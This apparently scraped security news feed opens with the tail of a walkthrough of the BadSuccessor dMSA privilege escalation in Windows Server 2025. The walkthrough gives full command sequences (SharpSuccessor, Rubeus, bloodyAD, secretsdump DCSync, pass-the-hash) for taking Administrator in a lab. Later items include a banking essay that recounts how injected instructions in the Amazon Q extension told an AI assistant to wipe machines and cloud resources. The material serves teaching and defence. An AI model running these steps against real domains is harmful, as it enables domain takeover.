a help desk tech), you might have permission to create a new dMSA in a specific folder (OU).</li><li><strong>Self-Linking:</strong> Because you “own” the dMSA you just created, you have the right to edit its attributes.</li><li><strong>The Oversight:</strong> Windows Server 2025 allowed you to write <em>any</em> account name into the msDS-ManagedAccountPrecededByLink attribute of <strong>your</strong> dMSA. It didn't check if you actually had permission over the account you were linking to!</li></ol><h4>2.1 Why this is a problem</h4><p>If I am a low-level user, I can create a dMSA and “link” it to the <strong>Domain Administrator</strong>.</p><p>The system sees my dMSA and says: <em>“Oh, I see you’re the successor to the Domain Admin. Since you told me the migration is ‘Complete’ (</em><strong>msDS-DelegatedMSAState</strong> attribute = State 2)<em>, I’ll just give you all of their permissions.”</em></p><h3>3. The Ticket Request</h3><p>Now we get to the “payoff” — how the attacker actually uses this link to gain control. This happens through <strong>Kerberos</strong>, the standard authentication protocol for Windows networks.</p><p>The attacker doesn’t need to know the Domain Admin’s password. They only need to authenticate as the <strong>dMSA</strong> they created (the “Successor”). Since they created it, they have full control over it.</p><p>They request a <strong>Kerberos Ticket (TGT)</strong> for the dMSA.</p><h4>3.1 The KDC’s Mistake</h4><p>When the Domain Controller (acting as the Key Distribution Center, or <strong>KDC</strong>) receives this request, it looks at the dMSA object and sees two things:</p><ol><li><strong>Link:</strong> It points to the Domain Admin.</li><li><strong>State:</strong> It is set to <strong>2</strong> (Completed).</li></ol><p>Because the state is “Completed,” the KDC follows a new rule built into Windows Server 2025: <strong>“If a migration is complete, the successor (dMSA) should act as the predecessor (Admin).”</strong></p><h4>3.2 SID Injection</h4><p>The KDC builds a <strong>PAC (Privilege Attribute Certificate)</strong> inside the Kerberos ticket.</p><ul><li>Normally, this PAC would only contain the dMSA’s low-level permissions.</li><li>But because of the link, the KDC <strong>automatically copies</strong> the Security Identifiers (SIDs) of the Domain Admin and all their powerful groups (like “Schema Admins” or “Enterprise Admins”) into the dMSA’s ticket.</li></ul><p>The attacker now holds a digital “badge” that says they are a dMSA, but it has the “stamps” of a Domain Admin on the back, effectively impersonating the Domain Admin.</p><h3>4. Privilege Escalation with BadSuccessor — A Proof Of Concept</h3><p>We will now see this exploit in action. Suppose you have already gotten a shell as a low-level AD user. If you are a TryHackMe subscriber, you can try out in this <a href="https://tryhackme.com/room/adbadsuccessor">room</a>.</p><h4>4.1 In Windows:</h4><p>To check for vulnerability, we can use the <a href="https://github.com/akamai/BadSuccessor">Get-BadSuccessorOUPermissions.ps1</a> script. We can also check manually with the following:</p><ul><li><strong>Domain Controllers</strong>: Must be running <strong>Windows Server 2025</strong>.</li><li><strong>Target OU:</strong> You need CreateChild (or Write / GenericWrite / GenericAll) permissions on an Organizational Unit (OU). This is common for "Account Operators" or delegated IT staff.</li></ul><pre># Check that DC is running Windows Server 2025<br>Get-ADDomainController -Filter *<br><br># Check your username and groups<br>whoami /groups<br><br># Check all OUs in the AD<br>Get-ADOrganizationalUnit -Filter * | Select-Object Name, DistinguishedName<br><br># Check who has what rights on an OU<br> (Get-ACL -Path "AD:\OU=lab,DC=example,DC=com").access | Select-Object ActiveDirectoryRights,IdentityReference<br><br>## If your user or group have CreateChild/GenericAll/WriteDACL/WriteOwner, <br>## then likely we can use BadSuccessor exploit</pre><p>Once we checked that we have the required rights on an OU, we can then use <a href="https://github.com/logangoins/SharpSuccessor">SharpSuccessor</a> tool. It is in C sharp and can be compiled with Visual Studio, or using mono with xbuild in linux, as I did below:</p><pre>&gt; git clone https://github.com/logangoins/SharpSuccessor.git<br>&gt; cd SharpSuccessor<br>&gt; sudo apt install mono-complete -y<br>&gt; xbuild SharpSuccessor.sln /p:Configuration=Release</pre><p>An alternative tool is <a href="https://github.com/LuemmelSec/Pentest-Tools-Collection/blob/main/tools/ActiveDirectory/BadSuccessor.ps1">here</a>, but I have not tested this.</p><p>Here is an overview of the commands of the steps I took using SharpSuccessor:</p><pre>## 1. Check the OU that your user has the permissions for BadSuccessor<br>PS C:\PoC&gt; .\Get-BadSuccessorOUPermissions.ps1<br><br>## 2. Create a dMSA account that is linked to any other privileged account you want (usually Administrator)<br>PS C:\PoC&gt; .\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:attacker /impersonate:Administrator<br><br>## 2. (Optional) Verify the account you created<br>Get-ADObject -Filter 'name -eq "attacker"' -Properties *<br><br>## 3. Using Rubeus, get a TGT for your current user<br>PS C:\PoC&gt; .\Rubeus.exe tgtdeleg /nowrap<br><br>## 3. (Alternative method)<br>PS C:\PoC&gt; .\Rubeus.exe hash /user:tbyte /password:P@SSw0rd345 /domain:tryhackme.local<br>PS C:\PoC&gt; .\Rubeus.exe asktgt /user:tbyte /aes256:&lt;aes-hash&gt; /nowrap<br><br>## 4. Now get a TGT for the dMSA account you created<br>PS C:\PoC&gt; .\Rubeus.exe asktgs /targetuser:attacker$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:&lt;base64 ticket&gt;<br><br>## 4. With the TGT, you essentially have the rights of the Administrator! <br>PS C:\PoC&gt; dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\</pre><p><strong>Step 1: </strong>Check the OU that your user has the permissions for BadSuccessor</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/403/1*QwPeCEQd6rYW1xGNrmtYGQ.png"></figure><p><strong>Step 2</strong>: Create a dMSA account that is linked to any other privileged account you want (usually Administrator)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/945/1*TjuQqGfFdYrha8cKYDfPug.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/941/1*JNUak87RiEMj1S9cRWi03w.png"></figure><p><strong>Step 3: </strong>Using Rubeus, get a TGT for your current user</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/787/1*EkRVK-9eoz6wRQzd3Sk-KA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/852/1*WQsq8pw6sM4GvS6iVIFxeg.png"></figure><p><strong>Step 4: </strong>Now get a TGT for the dMSA account you created</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xB_7qvv81qYk1_Z8ocxkmA.png"></figure><p><strong>Step 5</strong>: With the TGT, you can access the Administrator’s desktop!</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/571/1*6yckjHL8Yc6K2Qwzyw7qaQ.png"></figure><h4>4.2 In Linux:</h4><p>You can check if a server is exploitable using netexec:</p><pre>nxc ldap 10.211.101.10 -u tbyte -p 'P@SSw0rd345' -d tryhackme.local --dns-server 10.211.101.10 -M badsuccessor</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1Rjint-QKZoITeXf3eUKnw.png"></figure><p>To exploit, you can use the <a href="https://github.com/CravateRouge/bloodyAD">bloodyAD</a> tool as below. Another exploit tool can be found <a href="https://github.com/cybrly/badsuccessor">here</a>. An overview of the commands I used is as follows:</p><pre>## 0. Preparing your Kali Linux with the tools<br>sudo nano /etc/hosts<br># Add the following into /etc/hosts:<br># 10.211.101.10   DC-LAB2025-01.tryhackme.local tryhackme.local DC-LAB2025-01&gt;<br>pipx install bloodyAD<br><br>## 1. Check if our user have the CreateChild rights over any OU<br>bloodyAD -d tryhackme.local -u 'tbyte' -p 'P@SSw0rd345' --host DC-LAB2025-01.tryhackme.local get writable --detail<br><br>## 2. Create a dMSA object and saves the TGT as a .ccache<br>bloodyAD -d tryhackme.local -u 'tbyte' -p 'P@SSw0rd345' --host DC-LAB2025-01.tryhackme.local add badSuccessor pentest2_dmsa<br><br>## 2. (Optional) Verify the account created<br>bloodyAD -d tryhackme.local -u tbyte -p 'P@SSw0rd345' --host DC-LAB2025-01.tryhackme.local get object 'pentest2_dmsa$'<br><br>## 2. (Optional) If account is created, but you didn't get TGT due to error, get the dMSA TGT<br>python3 getTGT.py -dc-ip 10.211.101.10 tryhackme.local/tbyte:'P@SSw0rd345'<br>export KRB5CCNAME=tbyte.ccache<br>python3 getST.py -k -no-pass -dc-ip 10.211.101.10 -impersonate 'pentest2_dmsa$' -self -dmsa 'tryhackme.local/tbyte'<br><br>## 3. Export the TGT into the environment variable so we can use it<br>export KRB5CCNAME=pentest2_dmsa_ts.ccache<br><br>## 4. DC sync to get administrator hash<br>python3 /opt/impacket/examples/secretsdump.py -k -no-pass 'pentest2_dmsa$'@DC-LAB2025-01.tryhackme.local<br><br>## 5. Pass the hash to get a shell as Administrator<br>python3 /opt/impacket/examples/wmiexec.py 'tryhackme.local/administrator@10.211.101.10' -hashes :984f755c74xxxxxxxxxxxxxx43976fec</pre><p><strong>Step 1: </strong>Check if our user have the CreateChild rights over any OU.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/955/1*Job6rds8zHWAYbCCBiSpPw.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/456/1*r35RY976juPV-wC9Qemf2w.png"></figure><p><strong>Step 2: </strong>Create a dMSA object that is linked to ‘Administrator’ account</p><ul><li>I tried this in the AttackBox on THM and it worked without issue, then tried to replicate it on my own machine, and got an error below.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kAO4iAxqMfj64u22cvcIAw.png"></figure><ul><li>Despite the error, the dMSA account has already been created, as can be verified like below.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0jfNU9cGjtAFDq_tcO3tHg.png"></figure><ul><li>Get a TGT for your user, and export to KRB5CCNAME</li></ul><pre>python3 getTGT.py -dc-ip 10.211.101.10 tryhackme.local/tbyte:'P@SSw0rd345'<br>export KRB5CCNAME=tbyte.ccache</pre><ul><li>Now get a TGT for the dMSA account</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/956/1*trYdBszicYy6hV0vx_1s4g.png"></figure><p><strong>Step 3</strong>: Export the TGT into the environment variable so we can use it</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/710/1*-fDFxBJBhFlz2eSir76P7A.png"></figure><p><strong>Step 4</strong>: DC sync to get administrator hash</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*aZco08886vTmAAmPcZWn_g.png"></figure><p><strong>Step 5</strong>: Get an administrator shell with Pass-the-hash</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/931/1*FAARsxHmsOkdTb0vB1wa_w.png"></figure><h3>References</h3><ul><li><a href="https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory">https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory</a></li><li><a href="https://www.tarlogic.com/blog/badsuccessor/">https://www.tarlogic.com/blog/badsuccessor/</a></li><li><a href="https://tryhackme.com/room/adbadsuccessor">https://tryhackme.com/room/adbadsuccessor</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=0f2c84223bbb" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/badsuccessor-exploiting-delegated-managed-service-accounts-in-windows-server-2025-0f2c84223bbb">BadSuccessor — Exploiting delegated Managed Service Accounts in Windows Server 2025</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shadow AI is a business design problem, but it can be overcome]]></title>
<description><![CDATA[Shadow AI is everywhere, but banning it will only make matters worse.]]></description>
<link>https://tsecurity.de/de/3651205/it-nachrichten/shadow-ai-is-a-business-design-problem-but-it-can-be-overcome/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651205/it-nachrichten/shadow-ai-is-a-business-design-problem-but-it-can-be-overcome/</guid>
<pubDate>Tue, 07 Jul 2026 12:33:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Shadow AI is everywhere, but banning it will only make matters worse.]]></content:encoded>
</item>
<item>
<title><![CDATA[Build or buy? Smart CIOs know the answer for AI talent]]></title>
<description><![CDATA[The key ingredient for successful AI deployment is largely becoming the talent available, not the AI tools installed, putting pressure on IT leaders to upskill their workforces.



With AI skills both the highest in demand and the hardest to hire for, many IT leaders and their C-suite colleagues ...]]></description>
<link>https://tsecurity.de/de/3651103/it-security-nachrichten/build-or-buy-smart-cios-know-the-answer-for-ai-talent/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651103/it-security-nachrichten/build-or-buy-smart-cios-know-the-answer-for-ai-talent/</guid>
<pubDate>Tue, 07 Jul 2026 12:08:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The key ingredient for successful AI deployment is largely becoming the talent available, not the AI tools installed, putting pressure on IT leaders to upskill their workforces.</p>



<p>With AI skills both the <a href="https://www.cio.com/article/4096592/the-10-hottest-it-skills-for-2026.html">highest in demand</a> and <a href="https://www.cio.com/article/4184685/the-11-hardest-it-roles-to-fill-in-2026-and-whats-changed.html">the hardest to hire for</a>, many IT leaders and their C-suite colleagues are rolling out comprehensive <a href="https://www.cio.com/article/4100412/it-talent-heres-how-cios-curate-engagement-and-retention.html?utm=hybrid_search">AI training programs</a> for employees, both for the IT pros who build AI tools and the business users who will use them.</p>



<p>Smart companies will need to invest heavily in upskilling, says <a href="https://www.devry.edu/newsroom/administration/chris-campbell.html" rel="nofollow">Chris Campbell</a>, CIO at DeVry University. “The pace of change is simply too fast to rely solely on external hiring,” he says. “Organizations that develop AI capabilities across their existing workforce will have an advantage over those trying to win a bidding war for a relatively small pool of experts.”</p>



<p>Moreover, the key elements of what leads to a beneficial AI deployment has changed over time, he says.</p>



<p>“Early on, everyone was worried about access to AI tools,” Campbell adds. “Today, the tools are everywhere. What I see organizations struggling with is figuring out how to apply them to real business problems and integrate them into how work actually gets done.”</p>



<p>At DeVry, some of the strongest AI advocates don’t come from traditional AI backgrounds, but from software engineering, business analysis, cybersecurity, project management, and operations, he says.</p>



<p>“They understand the business, know where the friction points are, and can see where AI can create value,” he adds. “Those skills are often more important than deep expertise in a particular model or tool.”</p>



<p>Experienced <a href="https://www.cio.com/article/230935/hiring-the-most-in-demand-tech-jobs-for-2021.html">AI talent is difficult to find</a>, especially when IT leaders seek candidates who have successfully transitioned AI initiatives from experimentation to production.</p>



<p>“I don’t think every company needs to build a large team of AI specialists,” Campbell says. “In many cases, the people best positioned to drive AI adoption are already inside the organization.”</p>



<h2 class="wp-block-heading">Upskilling for an AI builder culture</h2>



<p>Professional services and accounting firm KPMG is addressing its AI talent challenge by providing widespread AI training to employees, says <a href="https://www.linkedin.com/in/rema-serafi/" rel="nofollow">Rema Serafi</a>, vice chairwoman for tax operations there. Many organizations’ major AI problem in 2026 is a lack of talent, not a lack of technology, she adds.</p>



<p>Forty percent of CIOs surveyed for this year’s <a href="https://us.resources.cio.com/resources/state-of-the-cio/" rel="nofollow">State of the CIO report</a> cited <a href="https://www.cio.com/article/4165232/whats-holding-back-enterprise-ai-shortage-of-talent-cios-say.html">lack of in-house talent as a top impediment</a> to implementing their AI strategies.</p>



<p>To address this, KPMG has piloted a six-week AI training program, with the goal of enabling all employees to deploy their own AI tools, Serafi says. The program familiarizes employees with Python and other technologies that serve as building blocks for internal AI tools, she says.</p>



<p>KPMG also revamped its team structures to ensure that three categories of employees — AI power users, makers, and builders — work closely together, says Serafi.</p>



<p>“Everyone’s going to have access to our tools, and everyone’s going to be a power user,” she says, “to the extent that those professionals who didn’t come in with AI capabilities, who didn’t come in as engineers or technologists, if they want to learn, we’re going to certify them to build tools as well.”</p>



<p>Deploying sophisticated, best-in-class AI tools without training employees is like buying an F1 racing car but not hiring a professional driver, she says.</p>



<p>“If we don’t have professionals who know how to use it, they’re not going to be able to maximize the benefit of what’s available to them,” Serafi adds.</p>



<p>KPMG commissioned a study with the University of Texas and found that employees who use AI regularly produce higher-quality work and feel less stressed. Employees who are expert users of AI will progress faster in their careers, she suggests. One challenge for training programs, though, is keeping up with how fast AI is evolving.</p>



<p>“The roles are actually changing in a short period of time,” she says. “When you used to see traditional engineers working with AI, now you see professionals who can actually guide, shape, and direct AI in their client work.”</p>



<h2 class="wp-block-heading">Retraining: ‘The only realistic path forward’</h2>



<p>Another fan of comprehensive AI training for employees is <a href="https://www.linkedin.com/in/elmerm/" rel="nofollow">Elmer Morales</a>, founder and CEO of agentic AI coding startup koder.com. Finding outside AI talent has become extremely difficult for most companies, he says.</p>



<p>“Retraining isn’t optional anymore,” he says. “It’s the only realistic path forward for most organizations. The external talent market can’t supply what every company simultaneously needs, and waiting for universities to catch up isn’t a strategy.”</p>



<p>Companies that succeed with AI treat upskilling as a core investment, not just an HR initiative, Morales adds.</p>



<p>“The talent gap is the single most concrete ceiling on AI ambition right now,” he says. “Companies can buy the best models, the best infrastructure, and the best tooling, and still produce nothing of value because they don’t have the people who know how to wire it all together into something that actually works in production.”</p>



<p>Morales suggests that IT leaders look to their existing engineering team to build AI deployment talent.</p>



<p>“The engineers already obsessed with this on nights and weekends, who are shipping personal projects and experimenting with new models, those people just need permission, resources, and a real problem to solve,” he says. “The best AI teams I’ve seen weren’t built by recruiting, but by creating the conditions for the right people to step forward.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Erling Haaland Is Everywhere at the World Cup. Most of It Is AI]]></title>
<description><![CDATA[Norwegian striker Erling Haaland isn’t just a footballer anymore. He’s become an internet character perpetuated by fans and AI.]]></description>
<link>https://tsecurity.de/de/3651097/ai-nachrichten/erling-haaland-is-everywhere-at-the-world-cup-most-of-it-is-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651097/ai-nachrichten/erling-haaland-is-everywhere-at-the-world-cup-most-of-it-is-ai/</guid>
<pubDate>Tue, 07 Jul 2026 12:03:48 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Norwegian striker Erling Haaland isn’t just a footballer anymore. He’s become an internet character perpetuated by fans and AI.]]></content:encoded>
</item>
<item>
<title><![CDATA[With AI, a wrong answer is a bug. A wrong action is an incident]]></title>
<description><![CDATA[A copilot that gives a wrong answer is a quality problem. An AI agent that takes a wrong action is an incident, sometimes a reportable one. That single difference is most of the story of where banking AI security is heading, and most banks’ current controls were built for the first kind of proble...]]></description>
<link>https://tsecurity.de/de/3650949/it-nachrichten/with-ai-a-wrong-answer-is-a-bug-a-wrong-action-is-an-incident/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650949/it-nachrichten/with-ai-a-wrong-answer-is-a-bug-a-wrong-action-is-an-incident/</guid>
<pubDate>Tue, 07 Jul 2026 11:03:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A copilot that gives a wrong answer is a quality problem. An AI agent that takes a wrong action is an incident, sometimes a reportable one. That single difference is most of the story of where banking AI security is heading, and most banks’ current controls were built for the first kind of problem, not the second.</p>



<p>For two years, the AI a bank had to worry about mostly read and summarized. It drafted a customer email, pulled the gist of a credit memo, answered a relationship manager’s product question. The security questions were about disclosure: could the model see data it shouldn’t, could it leak that data in an answer. Redaction, output filtering and a human reading the response before it went anywhere were reasonable defenses.</p>



<p>Banks have moved past that, faster than most security programs have. The newer systems are agents. They don’t just answer; they act. An agent can pull a customer’s full transaction history, call a fraud-scoring service, adjust a limit or start a payment workflow, chaining several to finish a task with no human in between. Banks are among the most aggressive adopters of agentic AI, and they are pushing it into production faster than most security programs have kept pace with, which means they are also among the first to inherit the security problem that comes with it.</p>



<p>I’d put that problem in one phrase: overprivileged agents. The risk is no longer mainly what the model can see. It is what the agent is allowed to do inside systems that move money and hold regulated data.</p>



<p>This is no longer only a vendor’s warning. On April 30, 2026, the cyber agencies of the Five Eyes nations issued their first joint guidance on securing agentic AI, <a href="https://www.cyber.gov.au/business-government/secure-design/artificial-intelligence/careful-adoption-of-agentic-ai-services" rel="nofollow"><em>Careful Adoption of Agentic AI Services</em></a>. Six agencies signed it, two of them American (CISA and the NSA), alongside the lead agencies of the UK, Australia, Canada and New Zealand. It names privilege as the leading category of agentic risk and calls strict least privilege critical. When five governments coordinate on a single control, “best practice” becomes “expected practice” quickly. For a CISO, that moves the timeline up.</p>



<h2 class="wp-block-heading">What “too much authority” actually looks like</h2>



<p><a href="https://genai.owasp.org/llmrisk/llm062025-excessive-agency/" rel="nofollow">OWASP’s breakdown of the failure mode it calls excessive agency</a> maps cleanly onto a bank. <em>Excessive functionality</em> is an agent that can reach tools its task never needed, like a servicing agent that can also touch the payments API “just in case.” <em>Excessive permissions</em> is the right tool at the wrong scope: a reconciliation agent meant only to read, running with credentials that can also write. <em>Excessive autonomy </em>is a consequential action with no human in the loop: a fee reversed, a limit raised, a record changed, with nothing checking it. In practice these rarely appear alone; they compound.</p>



<p>The canonical example is mundane: an agent that reads one user’s data through an account that can see everyone’s. Translate that to a bank and it becomes an agent that can query every customer’s records to answer a question about one. That is the confused-deputy problem: the agent acts with the full authority of whatever identity it borrowed, while taking instructions from input an attacker may control.</p>



<h2 class="wp-block-heading">The mechanism, from a real incident</h2>



<p>The clearest public illustration so far comes from developer tooling rather than banking, but the mechanism is identical. In July 2025, an attacker used an over-scoped build token to slip malicious code into the open-source repository behind the Amazon Q Developer extension for VS Code, and it shipped in an official release (<a href="https://aws.amazon.com/security/security-bulletins/AWS-2025-015/" rel="nofollow">CVE-2025-8217</a>). The injected instructions told the AI assistant to wipe the local machine and delete cloud resources, down to specific S3 buckets and EC2 instances. The assistant could reach the local filesystem, the shell and AWS CLI tools, so structurally little stood between those instructions and real damage. What stopped them was a bug: the payload had a syntax error and never ran, and AWS found no customer environments affected. But the extension had been installed close to a million times, and the margin of safety was an accident.</p>



<p>The uncomfortable part is not that the agent was “hacked” in the usual sense. Had the attacker’s code been written correctly, the agent would have done exactly what the injected text told it, through a channel it trusted. The lesson: an agent with broad tools, write access and no approval gate is dangerous not only when someone steals its credentials, but any time someone can reach its input. And in a bank, reachable inputs sit everywhere an agent reads text it did not author: the memo line on a wire, a customer’s email in a dispute, a PDF uploaded to a loan file, a free-text field in a KYC record. This is indirect prompt injection, and the defenses for it are still partial. You cannot reliably solve it by instructing the agent to behave. You solve it by limiting what it is able to do, regardless of what it is told.</p>



<h2 class="wp-block-heading">What I keep seeing in deployments</h2>



<p>In the redaction-control work I’ve done with banks, the gap is rarely the model. It is that the agent gets wired to the data and the tools first; what it should be allowed to reach gets asked later, if at all.</p>



<p>One pattern recurs. A customer-servicing agent is wired into the core banking system to resolve account queries. To answer a simple question, it pulls the customer’s entire profile into context: full account number, date of birth, the complete transaction narrative. The task needed the last four digits and a list of recent transactions; the agent got everything, and each field then sat in prompts, logs and traces never scoped as sensitive data. The fix was not a sharper prompt. It was moving redaction to the retrieval boundary, so those fields were tokenized before they reached the agent, and scoping its read access to the one customer in the open case, not the whole table.</p>



<p>The other half of the problem is authority, not data. That same agent often shares a service account with a batch job, so it can write to fields well beyond a customer’s question. A dedicated identity with its own scoped, short-lived credentials is unglamorous work, but it is the difference between an agent that can read one case and one that can quietly change thousands.</p>



<h2 class="wp-block-heading">Extending controls banks already have</h2>



<p>The reassuring part is that banks are not starting from zero. Maker-checker, segregation of duties, four-eyes approval, least privilege, immutable audit: this is muscle memory in a bank. The work is extending it to a non-human actor that runs at machine speed.</p>



<p>Give the agent its own managed identity with narrowly scoped, short-lived credentials instead of letting it borrow an employee’s session. That is the direct fix for the confused-deputy problem, and what the joint guidance asks for. Scope tools per task and per resource: read versus write, and which accounts, not a blanket grant. Put irreversible, high-impact actions (moving money, changing entitlements, closing accounts, exporting bulk data) behind explicit approval gates, the human-in-the-loop the guidance reserves for high-cost actions. Redact at the data-access boundary, not only on the output: an agent that never retrieves the full account number cannot leak it downstream. And log the agent’s plan and every tool call, not just its final answer, because in an agentic system the damage lives in the actions.</p>



<h2 class="wp-block-heading">Why the clock is real</h2>



<p>Regulation has put a date on this. <a href="https://www.amsshardul.com/insight/enforcement-of-the-dpdp-act-and-notification-of-the-dpdp-rules/" rel="nofollow">India’s Digital Personal Data Protection Rules</a> were notified on November 14, 2025; the institutional provisions are already in force, and the substantive obligations (purpose limitation, data minimization, breach notification) take full effect in May 2027. Under that lens, an agent that can reach more customer data than its task requires is not only a security weakness; it is a data-minimization and accountability problem. Banks under GDPR or the EU AI Act face the same logic from a different statute.</p>



<p>One honest caveat: none of these laws actually names AI agents. Mapping their principles onto agent authorization is interpretation and prudent risk management, and each bank should work the specifics through with its own legal and compliance teams rather than treat the matter as settled.</p>



<h2 class="wp-block-heading">The trade-offs nobody has solved</h2>



<p>None of this is free. Approval gates work against the entire reason to deploy an agent: gate every action and you have rebuilt a slower manual process. Deciding which actions to gate, and which can run autonomously within tight scope, is a real design problem that turns on each workflow’s blast radius. Logging every plan and tool call produces audit volume most pipelines were not built for. Standards for agent identity are still immature, and the agent supply chain is itself an attack surface, as the Amazon Q case showed.</p>



<p>These are real tensions, not problems with clean answers. But the governance gap that the 2026 surveys keep finding is not a story of banks failing to deploy agents. It is controls trailing agents that are already running. The alternative, porting copilot-era defenses onto agents and trusting output filters, guards the wrong door.</p>



<p>Banks are hitting this first because they are ahead. That is also the opportunity: the institutions that settle their agent authorization model now, while deployments are still small enough to change course, will not just avoid the incident. They will set the pattern everyone else copies.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google auf dem Desktop: Wird der Chrome-Browser zum trojanischen Pferd? Neue Integrationen kommen]]></title>
<description><![CDATA[Es ist noch gar nicht so lang her, dass die Google-App für Windows gestartet ist, die einen überraschend großen Funktionsumfang und praktische Zugänge in eine schlanke App bringt. Schon bald könnte es dieser wieder an den Kragen gehen, denn jetzt zeigt sich eine völlig neue Funktion in Google Chr...]]></description>
<link>https://tsecurity.de/de/3650659/it-nachrichten/google-auf-dem-desktop-wird-der-chrome-browser-zum-trojanischen-pferd-neue-integrationen-kommen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650659/it-nachrichten/google-auf-dem-desktop-wird-der-chrome-browser-zum-trojanischen-pferd-neue-integrationen-kommen/</guid>
<pubDate>Tue, 07 Jul 2026 08:32:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="360" src="https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-1024x576.jpg" class="attachment-large size-large wp-post-image" alt="chrome everywhere" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-1024x576.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-300x169.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-768x432.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-640x360.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere-800x450.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/chrome-everywhere.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Es ist noch gar nicht so lang her, dass die <a href="https://www.googlewatchblog.de/2026/04/google-app-fuer-windows-das-kann-die-neue-power-app-bringt-ki-suche-google-lens-launcher-co-video-u/"><strong>Google-App für Windows</strong></a> gestartet ist, die einen überraschend großen Funktionsumfang und praktische Zugänge in eine schlanke App bringt. Schon bald könnte es dieser wieder an den Kragen gehen, denn jetzt zeigt sich eine völlig neue Funktion in <a href="https://www.googlewatchblog.de/2026/06/google-chrome-voellig-neue-omnibox-kommt-loom-koennte-google-app-fuer-windows-ersetzen-canary-flag/"><strong>Google Chrome</strong></a>, die das Potenzial hat, diese App zu ersetzen. Gleichzeitig könnte das einen erneuten Desktop-Boost geben.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/google-auf-dem-desktop-wird-der-chrome-browser-zum-trojanischen-pferd-neue-integrationen-zeigen-sich-u/">Google auf dem Desktop: Wird der Chrome-Browser zum trojanischen Pferd? Neue Integrationen kommen</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/3d098a22f1b24a2dbc772e45047acceb"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/3d098a22f1b24a2dbc772e45047acceb" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/google-auf-dem-desktop-wird-der-chrome-browser-zum-trojanischen-pferd-neue-integrationen-zeigen-sich-u/">Google auf dem Desktop: Wird der Chrome-Browser zum trojanischen Pferd? Neue Integrationen kommen</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
